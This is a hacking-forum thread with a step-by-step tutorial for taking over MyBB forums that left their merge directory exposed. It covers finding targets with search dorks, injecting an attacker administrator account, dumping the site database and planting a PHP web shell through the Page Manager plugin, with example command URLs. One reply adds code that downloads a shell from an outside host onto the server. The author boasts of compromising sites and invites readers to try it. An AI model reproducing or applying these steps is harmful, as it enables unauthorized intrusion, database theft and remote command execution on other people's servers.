Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


MyBB Exploitation via Open Merge Directory filter_list
Author
Message
MyBB Exploitation via Open Merge Directory #1
I've compromised a few sites with this. Oni was the first one to tell me about this, and was rather shocked that I never thought of it myself. I guess you could call it a 0day (as people have been) but it's not really a vulnerability and is just admin stupidity. Yes this is how ForumKorner was compromised (not by me) along with a ton of others. I was not the first to find/think of this method but I am the one writing the tutorial.

What will be supplied in this tutorial?
  • A detailed tutorial on hacking MyBB sites through open merge directory
  • How to shell a server once inside the MyBB administrator panel
  • A SQL database containing an admin user for MyBB forums (most recent)
  • Awesomeness

Starting Off
You're going to want to download the following SQL file:
http://www.multiupload.nl/XDX7UW82FU

Create an account on db4free.net then login, go to phpMyAdmin then select the database you created, then import. Select this downloaded file and you're golden.


Contains 1 administrator account as the SECONDARY usergroup, so you do not look like an administrator on the online page on the online list. The default password for the account is "ballsack"


Now you are going to want to find yourself a forum that has left the merge directory up. My favourite way of doing this is looking through my popular emails Junk folder to see "blah blah forum" and to know that you have not signed up to this forum. Once you've found your forum, go to /merge/ and see if it's still up.

However we can also use dorks to find the merge directory open on random forums (if you're a newb and don't want to target forums specifically).
Code:
intext:"MyBB Merge System - Version:" inurl:"/merge" This is just an example dork which returns ONE result. Play around with this, don't make me spoonfeed you dorks. Be creative.

Exploiting The Merge Directory
Once you have found your site with the open merge directory, you will be challenged with a page which looks similar to the following:
[Image: 6Ub5K.png]

Click on "Next". Make sure the two files are writeable then click "Next" again. Now select "MyBB 1.6 (Merge)" and then click "Next".

You will now be challenged with a page like this:
[Image: 6Ub9D.png]

On Database Configuration click "Run" and you will be challenged with a page like this:
[Image: 6Ubdl.png]

This is where you're going to need the details you created earlier with db4free.net. Fill out the information (host is db4free.net) like this, but obviously replace my details with yours:
[Image: 6Ubhe.png]

Make sure you have entered your details correctly then click "Next".

Now run the Usergroups, and once that's completed run the Users. When you run the users you will face a page like so:
[Image: 6Ubly.png]

This is nothing to worry about, and as we have only 1 user we need not change any settings, so just click "Next".

Success! We have now successfully merged in our user. Do not merge anything else into the database (this would be pointless anyway as there's nothing to merge into). Instead just browse to the very bottom and click "Cleanup". Do not worry about the "Completion" page. Just go straight back to the forum and login with your user details!

As you can see from the online list on the main board, we look like a regular user!
[Image: 6Ubuk.png]

Now navigate to the ACP link (Admin CP). Login with your details there! Now, you can stop here and have some fun, or continue on with the tutorial to find some more l33t shit.

Downloading The Database Correctly
There's a bitching feature in MyBB which allows you to download databases directly from the ACP itself. Head on over to the Tools and Maintenence tab, then select "Database Backups" from the left hand side. Click "New Backup".

We will now have something similar to this:
Spoiler:
[Image: 6UbEi.png]


You want to "Select All", change the filetype to Plain Text and then click "Perform Backup" like so:
Spoiler:
[Image: 6UbIj.png]


There you have it, a shiny new database!

Accessing The Server Beyond MyBB
This is a tricky one, and isn't the easiest. This one requires the forum plugin "Page Manager". There's a funny little problem with this plugin however, whereas it doesn't by default give every administrator the power to use it, only the super administrator, however we can still set ourselves to have access? Hmm.

Here's how you do it. Head on over to the main admin index again and select "Plugins" from the list on the left hand side. Search through the list and see if "Page Manager" is installed, if so, we're in luck! Now go on over to the Users & Groups tab and select "Admin Permissions" from the left hand side. Select your username (yolo420blaze) and then CTRL + F for "manage pages" and select "Yes".

Now save, and we can now access the page manager! Go to the Forums & Posts tab and select Page Manager from the left hand side. Now create a new page and make sure it doesn't show on the online list, but is live. Now you're going to use the following (but incredibly public) backdoor to be able to access a command line shell on the server:

PHP Code:
<?php $cmd = <<<EOD cmd EOD; if(isset($_REQUEST[$cmd])) { system($_REQUEST[$cmd]); } ?>

What this does, is tells the to basically request the command you enter. Now head on over to the url created. It should be something like so:
Code:
http://hackedsi.te/misc.php?action=yourpage

Now, to retreive commands from the server, do the following to your url:
Code:
http://hackedsi.te/misc.php?action=yourpage&cmd=ls

ls retreives all files in that directory. I suggest looking at an earlier tutorial of mine which shows some fun things to mess around with here: http://www.sinister.ly/thread-how-to-fin...ploitation

God damnit If I spent half the time I spent on this tutorial I'd be near finishing my work by now. I hate you guys. This is probably one of the longer tutorials I have wrote. I'm fucking tired, so excuse any grammatical errors. I'll proof read when I wake up.

Go try it on these forums: http://www.sinister.ly/thread-challenge-mybb-pwning

Well, I hope you enjoy this. Smile
[Image: F4Z9Dqw.png]

Reply

RE: MyBB Exploitation via Open Merge Directory #2
This is kickass. Wish I had a forum to try this on.
[Image: BXqGARG.png]

Reply

RE: MyBB Exploitation via Open Merge Directory #3
(02-13-2014, 07:09 AM)Duubz Wrote: This is kickass. Wish I had a forum to try this on.

Updated the thread at the bottom where you can find sites to try it on.
[Image: F4Z9Dqw.png]

Reply

RE: MyBB Exploitation via Open Merge Directory #4
The calendar templates execute PHP, you don't need them to have Page Manager.

Reply

RE: MyBB Exploitation via Open Merge Directory #5
(02-13-2014, 07:49 AM)Poochy Wrote: The calendar templates execute PHP, you don't need them to have Page Manager.

Holy shit, so they do. I'll see if the backdoor works in this.

It seems that it's just template code. The calender must be sanatized because they will not parse the backdoor, or any basic PHP.

EDIT #2: It in fact looks like smarty. I'm pretty sure MyBB doesn't use smarty though. I'm guessing it's just able to call those PHP handles but the rest is sanatized.
[Image: F4Z9Dqw.png]

Reply

RE: MyBB Exploitation via Open Merge Directory #6
Even back when I'd first figured out about this, I couldn't be assed to write a thread about it. Nice job on the thread.

(02-13-2014, 07:49 AM)Poochy Wrote: The calendar templates execute PHP, you don't need them to have Page Manager.

Could have sworn that was patched.
[Image: 7ajmN5P.jpg]

Telegram: Oni_SL (Link)

Reply

RE: MyBB Exploitation via Open Merge Directory #7
(02-13-2014, 08:07 AM)Oni Wrote: Even back when I'd first figured out about this, I couldn't be assed to write a thread about it. Nice job on the thread.


Could have sworn that was patched.

You can use file_get_contents and file_put_contents so you could use the following to upload a shell
PHP Code:
<?php $host= file_get_contents('http://www.yoursite.com/shell.txt'); file_put_contents("shell.php", $host); ?>

Reply

RE: MyBB Exploitation via Open Merge Directory #8
Wonder how long it will take until this is no longer a viable method.

Reply

RE: MyBB Exploitation via Open Merge Directory #9
(02-13-2014, 08:48 AM)Satan Wrote: Wonder how long it will take until this is no longer a viable method.

As long as there are stupid forum-owners, it will always be. Tongue
[Image: 7ajmN5P.jpg]

Telegram: Oni_SL (Link)

Reply

RE: MyBB Exploitation via Open Merge Directory #10
Yey! Thanks BreShie! I love you. I hope to see more tutorials from you. ^_^
[Image: dHJ4Beo.gif]
Hidden Lesson: Reactions are always instinctive whereas responses are always well thought of.

Reply